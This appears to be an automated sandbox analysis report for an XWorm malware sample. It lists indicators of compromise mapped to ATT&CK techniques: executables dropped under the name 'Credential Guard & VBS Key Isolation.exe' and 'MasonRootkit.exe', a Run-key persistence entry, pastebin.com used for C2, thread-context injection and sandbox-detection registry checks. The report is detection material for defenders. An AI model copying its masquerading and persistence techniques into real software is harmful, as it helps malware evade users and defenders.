xworm | a84273c5deb772a3c6d1e32e2c017136d734f82c160c6554eb0d7fed8203eb0c

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe

Executes dropped EXE 64 IoCs

pid	Process
3332	Credential Guard & VBS Key Isolation.exe
1616	Credential Guard & VBS Key Isolation.exe
1724	Credential Guard & VBS Key Isolation.exe
4420	Credential Guard & VBS Key Isolation.exe
1504	Credential Guard & VBS Key Isolation.exe
3100	Credential Guard & VBS Key Isolation.exe
1004	Credential Guard & VBS Key Isolation.exe
3620	Credential Guard & VBS Key Isolation.exe
2820	Credential Guard & VBS Key Isolation.exe
1316	Credential Guard & VBS Key Isolation.exe
4580	Credential Guard & VBS Key Isolation.exe
2292	Credential Guard & VBS Key Isolation.exe
3720	Credential Guard & VBS Key Isolation.exe
2584	Credential Guard & VBS Key Isolation.exe
5316	Credential Guard & VBS Key Isolation.exe
5472	MasonRootkit.exe
5580	Credential Guard & VBS Key Isolation.exe
5932	Credential Guard & VBS Key Isolation.exe
6136	Credential Guard & VBS Key Isolation.exe
3488	Credential Guard & VBS Key Isolation.exe
6020	Credential Guard & VBS Key Isolation.exe
5556	MasonRootkit.exe
5844	Credential Guard & VBS Key Isolation.exe
5372	Credential Guard & VBS Key Isolation.exe
6080	Credential Guard & VBS Key Isolation.exe
6396	Credential Guard & VBS Key Isolation.exe
5912	Credential Guard & VBS Key Isolation.exe
6692	Credential Guard & VBS Key Isolation.exe
6968	Credential Guard & VBS Key Isolation.exe
6152	Credential Guard & VBS Key Isolation.exe
5956	Credential Guard & VBS Key Isolation.exe
6844	Credential Guard & VBS Key Isolation.exe
6780	Credential Guard & VBS Key Isolation.exe
6164	Credential Guard & VBS Key Isolation.exe
6256	Credential Guard & VBS Key Isolation.exe
6400	Credential Guard & VBS Key Isolation.exe
6636	Credential Guard & VBS Key Isolation.exe
7200	Credential Guard & VBS Key Isolation.exe
7384	Credential Guard & VBS Key Isolation.exe
7656	Credential Guard & VBS Key Isolation.exe
7880	Credential Guard & VBS Key Isolation.exe
8180	Credential Guard & VBS Key Isolation.exe
7456	Credential Guard & VBS Key Isolation.exe
7712	Credential Guard & VBS Key Isolation.exe
5132	Credential Guard & VBS Key Isolation.exe
8008	Credential Guard & VBS Key Isolation.exe
1172	Credential Guard & VBS Key Isolation.exe
2368	Credential Guard & VBS Key Isolation.exe
2352	Credential Guard & VBS Key Isolation.exe
3248	Credential Guard & VBS Key Isolation.exe
2580	Credential Guard & VBS Key Isolation.exe
1548	Credential Guard & VBS Key Isolation.exe
5548	Credential Guard & VBS Key Isolation.exe
6096	Credential Guard & VBS Key Isolation.exe
1748	Credential Guard & VBS Key Isolation.exe
1616	Credential Guard & VBS Key Isolation.exe
5628	Credential Guard & VBS Key Isolation.exe
5364	Credential Guard & VBS Key Isolation.exe
6824	Credential Guard & VBS Key Isolation.exe
6364	Credential Guard & VBS Key Isolation.exe
6768	Credential Guard & VBS Key Isolation.exe
3500	Credential Guard & VBS Key Isolation.exe
2000	Credential Guard & VBS Key Isolation.exe
644	Credential Guard & VBS Key Isolation.exe

Loads dropped DLL 14 IoCs

pid	Process
7612	Credential Guard & VBS Key Isolation.exe
5432	Credential Guard & VBS Key Isolation.exe
1644	Credential Guard & VBS Key Isolation.exe
7284	Credential Guard & VBS Key Isolation.exe
1616	Credential Guard & VBS Key Isolation.exe
372	Credential Guard & VBS Key Isolation.exe
7088	Credential Guard & VBS Key Isolation.exe
7640	Process not Found
5896	Process not Found
5712	Process not Found
872	Process not Found
5092	Process not Found
6348	Process not Found
3952	Process not Found

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Credential Guard & VBS Key Isolation = "C:\\Users\\Admin\\AppData\\Roaming\\Credential Guard & VBS Key Isolation.exe"	Credential Guard & VBS Key Isolation.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
26	pastebin.com
193	pastebin.com
246	pastebin.com
322	pastebin.com
325	pastebin.com
132	pastebin.com
137	pastebin.com
194	pastebin.com
328	pastebin.com
122	pastebin.com
368	pastebin.com
46	pastebin.com
51	pastebin.com
76	pastebin.com
110	pastebin.com
231	pastebin.com
241	pastebin.com
316	pastebin.com
157	pastebin.com
197	pastebin.com
277	pastebin.com
295	pastebin.com
341	pastebin.com
389	pastebin.com
21	pastebin.com
185	pastebin.com
268	pastebin.com
271	pastebin.com
378	pastebin.com
385	pastebin.com
49	pastebin.com
211	pastebin.com
242	pastebin.com
392	pastebin.com
29	pastebin.com
32	pastebin.com
91	pastebin.com
158	pastebin.com
362	pastebin.com
142	pastebin.com
189	pastebin.com
227	pastebin.com
332	pastebin.com
82	pastebin.com
152	pastebin.com
257	pastebin.com
303	pastebin.com
209	pastebin.com
217	pastebin.com
296	pastebin.com
123	pastebin.com
219	pastebin.com
353	pastebin.com
402	pastebin.com
96	pastebin.com
102	pastebin.com
111	pastebin.com
112	pastebin.com
171	pastebin.com
183	pastebin.com
188	pastebin.com
206	pastebin.com
220	pastebin.com
235	pastebin.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 5556 set thread context of 5756	5556	MasonRootkit.exe	178

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	Process not Found
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	BootstrapperNew.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1060	5456	Process not Found	4514

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
6388	timeout.exe

